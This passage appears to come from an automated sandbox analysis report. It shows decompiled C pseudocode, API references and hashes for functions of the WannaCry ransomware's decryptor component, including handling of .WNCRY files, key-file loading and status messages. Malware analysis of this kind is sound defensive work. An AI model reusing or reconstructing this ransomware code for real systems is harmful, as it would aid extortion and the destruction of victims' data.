							L00412BAE();
							return _t19;
						} else {
							if(_t48 != 0) {
								if(_t48 != 1) {
									L9:
									if(_t48 == 0xffffffff) {
										L14:
										 *((intOrPtr*)(_t49 + 0xa8)) = 0xffffffff;
									}
									goto L15;
								} else {
									_push(__ecx);
									_a4 = _t50;
									L00412CAA();
									_t25 = E00401970("Succeed");
									_push(_a4);
									_push(_t48);
									_push(_t27);
									L00412BAE();
									return _t25;
								}
							} else {
								_push(__ecx);
								_a4 = _t50;
								L00412CAA();
								_t26 = E00401970("Received response");
								_push(_a4);
								_push(_t48);
								_push(_t27);
								 *((intOrPtr*)(_t49 + 0xa8)) = 1;
								L00412BAE();
								return _t26;
							}
						}
					}
				}
			}












                                  0x00401601
                                  0x00401609
                                  0x0040160d
                                  0x00401612
                                  0x00401614
                                  0x004016e7
                                  0x00401737
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004016e9
                                  0x004016e9
                                  0x004016ec
                                  0x004016f5
                                  0x004016fc
                                  0x00401710
                                  0x0040171c
                                  0x0040171d
                                  0x0040171e
                                  0x0040171f
                                  0x00401729
                                  0x00401731
                                  0x00401731
                                  0x0040161a
                                  0x0040161a
                                  0x0040161b
                                  0x00401691
                                  0x00000000
                                  0x00401693
                                  0x00401693
                                  0x00401696
                                  0x0040169f
                                  0x004016a6
                                  0x004016ba
                                  0x004016c6
                                  0x004016c7
                                  0x004016c8
                                  0x004016c9
                                  0x004016d3
                                  0x004016db
                                  0x004016db
                                  0x0040161d
                                  0x0040161d
                                  0x0040161e
                                  0x00401743
                                  0x00401749
                                  0x0040174a
                                  0x0040174b
                                  0x0040174c
                                  0x00401754
                                  0x00401624
                                  0x00401626
                                  0x00401661
                                  0x004016de
                                  0x004016e1
                                  0x00401739
                                  0x00401739
                                  0x00401739
                                  0x00000000
                                  0x00401663
                                  0x00401663
                                  0x00401666
                                  0x0040166f
                                  0x00401676
                                  0x00401681
                                  0x00401682
                                  0x00401683
                                  0x00401684
                                  0x0040168c
                                  0x0040168c
                                  0x00401628
                                  0x00401628
                                  0x0040162b
                                  0x00401634
                                  0x0040163b
                                  0x00401646
                                  0x00401647
                                  0x00401648
                                  0x00401649
                                  0x00401653
                                  0x0040165b
                                  0x0040165b
                                  0x00401626
                                  0x0040161e
                                  0x0040161b

                                  APIs
                                  • #2385.MFC42 ref: 00401653
                                  • #537.MFC42(Received response), ref: 00401634
                                    • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                    • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                    • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                  • #537.MFC42(Succeed), ref: 0040166F
                                  • #2385.MFC42(?,?,?,Succeed), ref: 00401684
                                  • #537.MFC42(Sent request), ref: 0040169F
                                  • SendMessageA.USER32(?,00000402,00000023,?), ref: 004016BA
                                  • #2385.MFC42 ref: 004016D3
                                  • #537.MFC42(Connected), ref: 004016F5
                                  • SendMessageA.USER32(?,00000402,0000001E,?), ref: 00401710
                                  • #2385.MFC42 ref: 00401729
                                  • #2385.MFC42(?,?,?), ref: 0040174C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2385$#537$MessageSend$#3092#6199#800
                                  • String ID: Connected$Received response$Sent request$Succeed
                                  • API String ID: 3790904636-3692714192
                                  • Opcode ID: 77cbd13b205d5b60acded2d534e2f67ef19f14b7a7dcd1ce5799653af05fca91
                                  • Instruction ID: e9690c31fbc1831b63af9a5cc079f352e9ea826ed21b4fe1124c0ccffc889961
                                  • Opcode Fuzzy Hash: 77cbd13b205d5b60acded2d534e2f67ef19f14b7a7dcd1ce5799653af05fca91
                                  • Instruction Fuzzy Hash: A631E8B130430067C5209F1AD959EAF7B69EBD4BB4F10852FF149A33D1CA795C4582FA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404DD0 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 89windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E00404DD0(void* __ecx) {
				intOrPtr _t12;
				long _t13;
				struct HFONT__* _t15;
				long _t16;
				long _t17;
				int _t29;
				int _t32;
				int _t35;

				L00412CB0();
				_t12 =  *0x42189c; // 0x0
				_t13 =  *(_t12 + 0x824);
				 *(__ecx + 0x6c) = _t13;
				_push(CreateSolidBrush(_t13));
				L00412D5E();
				_t35 = __ecx + 0x70;
				_t15 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t15);
				L00412D5E();
				_push(0x403);
				L00412CE6();
				if(_t35 != 0) {
					_t29 =  *(_t35 + 4);
				} else {
					_t29 = 0;
				}
				_t16 = SendMessageA( *(_t15 + 0x20), 0x30, _t29, 1);
				_push(1);
				L00412CE6();
				if(_t35 != 0) {
					_t32 =  *(_t35 + 4);
				} else {
					_t32 = 0;
				}
				_t17 = SendMessageA( *(_t16 + 0x20), 0x30, _t32, 1);
				_push(2);
				L00412CE6();
				if(_t35 != 0) {
					SendMessageA( *(_t17 + 0x20), 0x30,  *(_t35 + 4), 1);
					return 1;
				} else {
					SendMessageA( *(_t17 + 0x20), 0x30, _t35, 1);
					return 1;
				}
			}











                                  0x00404dd5
                                  0x00404dda
                                  0x00404ddf
                                  0x00404de6
                                  0x00404def
                                  0x00404df3
                                  0x00404e1a
                                  0x00404e1d
                                  0x00404e23
                                  0x00404e26
                                  0x00404e2b
                                  0x00404e32
                                  0x00404e39
                                  0x00404e3f
                                  0x00404e3b
                                  0x00404e3b
                                  0x00404e3b
                                  0x00404e51
                                  0x00404e53
                                  0x00404e57
                                  0x00404e5e
                                  0x00404e64
                                  0x00404e60
                                  0x00404e60
                                  0x00404e60
                                  0x00404e70
                                  0x00404e72
                                  0x00404e76
                                  0x00404e7d
                                  0x00404e9f
                                  0x00404ea9
                                  0x00404e7f
                                  0x00404e88
                                  0x00404e92
                                  0x00404e92

                                  APIs
                                  • #4710.MFC42 ref: 00404DD5
                                  • CreateSolidBrush.GDI32(?), ref: 00404DE9
                                  • #1641.MFC42(00000000), ref: 00404DF3
                                  • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00404E1D
                                  • #1641.MFC42(00000000), ref: 00404E26
                                  • #3092.MFC42(00000403,00000000), ref: 00404E32
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E51
                                  • #3092.MFC42(00000001), ref: 00404E57
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E70
                                  • #3092.MFC42(00000002), ref: 00404E76
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E88
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#3092$#1641Create$#4710BrushFontSolid
                                  • String ID: Arial
                                  • API String ID: 1126252797-493054409
                                  • Opcode ID: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                  • Instruction ID: f8dd995afa615cab71677879a74d6ff7c2e305333cbfc3da3be905e2a6067967
                                  • Opcode Fuzzy Hash: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                  • Instruction Fuzzy Hash: CC21C6B13507107FE625A764DD86FAA2759BBC8B40F10011EB345AB2D1CAF5EC41879C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406DC0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 103windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E00406DC0(void* __ecx) {
				int _v76;
				int _v80;
				char _v84;
				int _v88;
				long _v92;
				void* _v96;
				int _v100;
				void* _v104;
				long _t28;
				void* _t29;
				struct HWND__* _t30;
				int _t32;
				void* _t35;
				int _t39;
				long _t47;
				int _t48;
				void* _t51;

				_t35 = __ecx;
				_t48 = 0;
				_t28 = SendMessageA( *(__ecx + 0x4e0), 0xe, 0, 0);
				_t47 = _t28;
				_v96 = 0;
				_v92 = _t47;
				_t4 = _t47 + 1; // 0x1
				L00412CEC();
				_t51 =  &_v104 + 4;
				_v88 = _t28;
				if(_t28 == 0) {
					return _t28;
				}
				_t29 = _t35 + 0x4c0;
				if(_t29 != 0) {
					_t30 =  *(_t29 + 0x20);
				} else {
					_t30 = 0;
				}
				SendMessageA(_t30, 0x44b, _t48,  &_v96);
				_t32 = _v88;
				 *((char*)(_t32 + _t47)) = 0;
				if(_t47 < 0) {
					L15:
					_push(_v88);
					L00412C98();
					return _t32;
				} else {
					do {
						__imp___strnicmp(_t48 + _v88, "<http://", 8);
						_t51 = _t51 + 0xc;
						if(_t32 == 0) {
							L7:
							_t48 = _t48 + 1;
							_t39 = _t48;
							if(_t48 > _t47) {
								goto L14;
							}
							_t32 = _v88;
							while( *((char*)(_t48 + _t32)) != 0x3e) {
								_t48 = _t48 + 1;
								if(_t48 <= _t47) {
									continue;
								}
								goto L14;
							}
							_t32 = _t48;
							_t48 = _t48 + 1;
							if(_t32 != 0xffffffff) {
								_v100 = _t32;
								_v104 = _t39;
								SendMessageA( *(_t35 + 0x4e0), 0x437, 0,  &_v104);
								_t32 = 0x20;
								_push( &_v84);
								_v84 = 0x54;
								_v76 = 0x20;
								_v80 = 0x20;
								L00412F4A();
							}
							goto L14;
						}
						_t32 = _v88;
						__imp___strnicmp(_t48 + _t32, "<https://", 9);
						_t51 = _t51 + 0xc;
						if(_t32 != 0) {
							goto L14;
						}
						goto L7;
						L14:
						_t48 = _t48 + 1;
					} while (_t48 <= _t47);
					goto L15;
				}
			}




















                                  0x00406dcc
                                  0x00406dce
                                  0x00406ddc
                                  0x00406dde
                                  0x00406de0
                                  0x00406de4
                                  0x00406de8
                                  0x00406dec
                                  0x00406df1
                                  0x00406df6
                                  0x00406dfa
                                  0x00406ee6
                                  0x00406ee6
                                  0x00406e00
                                  0x00406e08
                                  0x00406e0e
                                  0x00406e0a
                                  0x00406e0a
                                  0x00406e0a
                                  0x00406e1d
                                  0x00406e1f
                                  0x00406e25
                                  0x00406e29
                                  0x00406ed2
                                  0x00406ed6
                                  0x00406ed7
                                  0x00000000
                                  0x00406e2f
                                  0x00406e2f
                                  0x00406e3e
                                  0x00406e44
                                  0x00406e49
                                  0x00406e67
                                  0x00406e67
                                  0x00406e6a
                                  0x00406e6c
                                  0x00000000
                                  0x00000000
                                  0x00406e6e
                                  0x00406e72
                                  0x00406e78
                                  0x00406e7b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406e7d
                                  0x00406e7f
                                  0x00406e81
                                  0x00406e85
                                  0x00406e8b
                                  0x00406e9e
                                  0x00406ea2
                                  0x00406ea8
                                  0x00406ead
                                  0x00406eb4
                                  0x00406ebc
                                  0x00406ec0
                                  0x00406ec4
                                  0x00406ec4
                                  0x00000000
                                  0x00406e85
                                  0x00406e4b
                                  0x00406e5a
                                  0x00406e60
                                  0x00406e65
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406ec9
                                  0x00406ec9
                                  0x00406eca
                                  0x00000000
                                  0x00406e2f

                                  APIs
                                  • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
                                  • #823.MFC42(00000001,?,?), ref: 00406DEC
                                  • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
                                  • _strnicmp.MSVCRT ref: 00406E3E
                                  • _strnicmp.MSVCRT ref: 00406E5A
                                  • SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
                                  • #6136.MFC42 ref: 00406EC4
                                  • #825.MFC42(?), ref: 00406ED7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$_strnicmp$#6136#823#825
                                  • String ID: <http://$<https://$T
                                  • API String ID: 1228111698-1216084165
                                  • Opcode ID: e226602ddc61248ba8de4c220f9c6f0969af954b0c2e6c7ec46426c0281c0da6
                                  • Instruction ID: 32e461136b03d60599108953de6477053a568cccd29e118696d71e5d9ed076ef
                                  • Opcode Fuzzy Hash: e226602ddc61248ba8de4c220f9c6f0969af954b0c2e6c7ec46426c0281c0da6
                                  • Instruction Fuzzy Hash: 7E31D6B52043509BD320CF18CC41FABB7E4BB98704F044A3EF98AD7281E678D95987D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402560 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 81fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E00402560(intOrPtr __ecx, WCHAR* _a4) {
				short _v720;
				intOrPtr _v724;
				void* _t21;
				void* _t22;
				WCHAR* _t23;
				void* _t30;
				short* _t31;
				intOrPtr* _t32;
				void* _t34;
				void* _t36;

				_t23 = _a4;
				_v724 = __ecx;
				_t30 = 0;
				wcscpy( &_v720, _t23);
				_t31 = wcsrchr( &_v720, 0x2e);
				_t34 =  &_v724 + 0x10;
				if(_t31 == 0) {
					L4:
					wcscat( &_v720, L".org");
				} else {
					_t32 = __imp___wcsicmp;
					_t21 =  *_t32(_t31, L".WNCRY");
					_t36 = _t34 + 8;
					if(_t21 == 0) {
						L3:
						 *_t31 = 0;
						_t30 = 1;
					} else {
						_t22 =  *_t32(_t31, L".WNCYR");
						_t34 = _t36 + 8;
						if(_t22 != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				if(E004020A0(_v724, _t23,  &_v720) == 0) {
					DeleteFileW( &_v720);
					goto L11;
				} else {
					if(DeleteFileW(_t23) == 0) {
						L11:
						return 0;
					} else {
						if(_t30 != 0) {
							return 1;
						} else {
							return MoveFileW( &_v720, _t23);
						}
					}
				}
			}













                                  0x00402567
                                  0x00402576
                                  0x0040257b
                                  0x0040257d
                                  0x00402590
                                  0x00402592
                                  0x00402597
                                  0x004025c9
                                  0x004025d3
                                  0x00402599
                                  0x00402599
                                  0x004025a5
                                  0x004025a7
                                  0x004025ac
                                  0x004025bd
                                  0x004025bd
                                  0x004025c2
                                  0x004025ae
                                  0x004025b4
                                  0x004025b6
                                  0x004025bb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004025bb
                                  0x004025ac
                                  0x004025ed
                                  0x0040262e
                                  0x00000000
                                  0x004025ef
                                  0x004025f8
                                  0x00402637
                                  0x00402640
                                  0x004025fa
                                  0x004025fc
                                  0x00402626
                                  0x004025fe
                                  0x00402614
                                  0x00402614
                                  0x004025fc
                                  0x004025f8

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Delete_wcsicmp$Movewcscatwcscpywcsrchr
                                  • String ID: .WNCRY$.WNCYR$.org
                                  • API String ID: 1016768320-4283512309
                                  • Opcode ID: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                  • Instruction ID: 8e688c7c8c2018b5eb76f9bfe5eaf8fc18d5300b1d9ff01e022ce9e0f1e53e02
                                  • Opcode Fuzzy Hash: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                  • Instruction Fuzzy Hash: 29219576240301ABD220DB15FE49BEB7799DBD4711F44483BF901A2280EB7DD90987BE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413102 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 80%
                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x41baa8);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x422298 =  *0x422298 | 0xffffffff;
				 *0x42229c =  *0x42229c | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x42228c; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x422288; // 0x0
				 *_t24 = _t47;
				 *0x422294 = _adjust_fdiv;
				_t27 = E004133C7( *_adjust_fdiv);
				_t61 =  *0x421790; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E004133C4);
				}
				E004133B2(_t27);
				_push(0x41f018);
				_push(0x41f014);
				L004133AC();
				_t29 =  *0x422284; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x422280,  &_v112);
				_push(0x41f010);
				_push(0x41f000);
				L004133AC();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E004133E6(GetModuleHandleA(0), _t39, 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L004133A6();
				return _t41;
			}





























                                  0x00413105
                                  0x00413107
                                  0x0041310c
                                  0x00413117
                                  0x00413118
                                  0x00413125
                                  0x0041312a
                                  0x0041312f
                                  0x00413136
                                  0x0041313d
                                  0x00413144
                                  0x0041314a
                                  0x00413150
                                  0x00413152
                                  0x00413158
                                  0x0041315e
                                  0x00413167
                                  0x0041316c
                                  0x00413171
                                  0x00413177
                                  0x0041317e
                                  0x00413184
                                  0x00413185
                                  0x0041318a
                                  0x0041318f
                                  0x00413194
                                  0x00413199
                                  0x0041319e
                                  0x004131b7
                                  0x004131bd
                                  0x004131c2
                                  0x004131c7
                                  0x004131d4
                                  0x004131d6
                                  0x004131dc
                                  0x00413218
                                  0x0041321d
                                  0x0041321e
                                  0x0041321e
                                  0x004131de
                                  0x004131de
                                  0x004131de
                                  0x004131df
                                  0x004131e2
                                  0x004131e4
                                  0x004131ef
                                  0x004131f1
                                  0x004131f1
                                  0x004131f2
                                  0x004131f2
                                  0x004131ef
                                  0x004131f5
                                  0x004131f9
                                  0x00000000
                                  0x00000000
                                  0x004131ff
                                  0x00413206
                                  0x00413210
                                  0x00413225
                                  0x00413212
                                  0x00413212
                                  0x00413212
                                  0x00413231
                                  0x00413236
                                  0x0041323a
                                  0x00413240
                                  0x00413245
                                  0x00413247
                                  0x0041324a
                                  0x0041324b
                                  0x0041324c
                                  0x00413253

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                  • String ID:
                                  • API String ID: 801014965-0
                                  • Opcode ID: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                  • Instruction ID: fcecf6e401754473f6225594f41014142e7d5ca2867d00c097f2044c16acc313
                                  • Opcode Fuzzy Hash: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                  • Instruction Fuzzy Hash: F9419F71940308EFCB20DFA4DC45AE97BB9EB09711B20016FF855972A1D7788A81CB6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404280 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 51windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E00404280(void* __ecx, char _a8) {
				void* _t9;
				struct HWND__* _t10;
				long _t12;
				long* _t22;
				void* _t24;

				_t24 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
					E00404530(__ecx);
				}
				_t9 = E004045E0(_t24,  &_a8);
				if(_t9 == 0) {
					L6:
					L00412CBC();
					return _t9;
				} else {
					_t22 = _t24 + 0x44;
					_push(0);
					_push("mailto:");
					L00412DB2();
					if(_t9 != 0) {
						_t9 = ShellExecuteA(0, "open",  *_t22, 0, 0, 1);
						goto L6;
					} else {
						_t10 = GetParent( *(_t24 + 0x20));
						_push(_t10);
						L00412DAC();
						_t12 = SendMessageA( *(_t10 + 0x20), 0x1388,  *(_t24 + 0x20),  *_t22);
						L00412CBC();
						return _t12;
					}
				}
			}








                                  0x00404281
                                  0x00404289
                                  0x0040428b
                                  0x0040428b
                                  0x00404297
                                  0x0040429e
                                  0x004042fd
                                  0x004042ff
                                  0x00404306
                                  0x004042a0
                                  0x004042a0
                                  0x004042a3
                                  0x004042a5
                                  0x004042ac
                                  0x004042b3
                                  0x004042f7
                                  0x00000000
                                  0x004042b5
                                  0x004042bb
                                  0x004042c1
                                  0x004042c2
                                  0x004042d5
                                  0x004042dd
                                  0x004042e4
                                  0x004042e4
                                  0x004042b3

                                  APIs
                                  • #6663.MFC42(mailto:,00000000,?), ref: 004042AC
                                  • GetParent.USER32(?), ref: 004042BB
                                  • #2864.MFC42(00000000), ref: 004042C2
                                  • SendMessageA.USER32(?,00001388,?,?), ref: 004042D5
                                  • #2379.MFC42 ref: 004042DD
                                    • Part of subcall function 00404530: #289.MFC42 ref: 0040455F
                                    • Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                    • Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                    • Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                    • Part of subcall function 00404530: #613.MFC42 ref: 004045BB
                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004042F7
                                  • #2379.MFC42(?), ref: 004042FF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2379#5789$#2864#289#613#6663ExecuteExtentMessageParentPoint32SendShellText
                                  • String ID: mailto:$open
                                  • API String ID: 1144735033-2326261162
                                  • Opcode ID: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                  • Instruction ID: 92cf742add8d60ef6c93fe1e72e53283c618a6078d8cf76be364cef0d5edaefa
                                  • Opcode Fuzzy Hash: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                  • Instruction Fuzzy Hash: AC0175753003106BD624A761ED46FEF7369AFD4B55F40046FFA41A72C1EAB8A8428A6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004038F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 70%
                                  			E004038F0(void* __ecx, void* __ebp) {
				long _v4;
				intOrPtr _v16;
				char _v1252;
				char _v1284;
				void* __edi;
				int _t20;
				int _t23;
				void* _t30;
				long _t48;
				void* _t50;
				intOrPtr _t53;
				void* _t54;

				_push(0xffffffff);
				_push(E0041367B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t53;
				_t54 = _t53 - 0x4f8;
				_t50 = __ecx;
				E00403EB0( *[fs:0x0], __ecx, 0);
				_t20 = SendMessageA( *(_t50 + 0xc0), 0x147, 0, 0);
				if(_t20 != 0xffffffff) {
					_t48 = SendMessageA( *(_t50 + 0xc0), 0x150, _t20, 0);
					_t57 =  *((intOrPtr*)(_t48 + 8));
					if( *((intOrPtr*)(_t48 + 8)) == 0) {
						E00403AF0(_t48, __ebp);
					}
					E00401E90( &_v1252, _t57);
					_v4 = 0;
					sprintf( &_v1284, "%08X.dky",  *((intOrPtr*)(_t48 + 8)));
					_t54 = _t54 + 0xc;
					if(E00402020( &_v1252,  &_v1284, E00403810, 0) != 0) {
						_t30 = E00403A20( &_v1252, _t48);
						__eflags = _t30;
						if(_t30 != 0) {
							_push(0);
							_push(0x40);
							_push("All your files have been decrypted!");
							goto L8;
						}
					} else {
						if( *((intOrPtr*)(_t48 + 8)) == 0) {
							_push(0);
							_push(0x40);
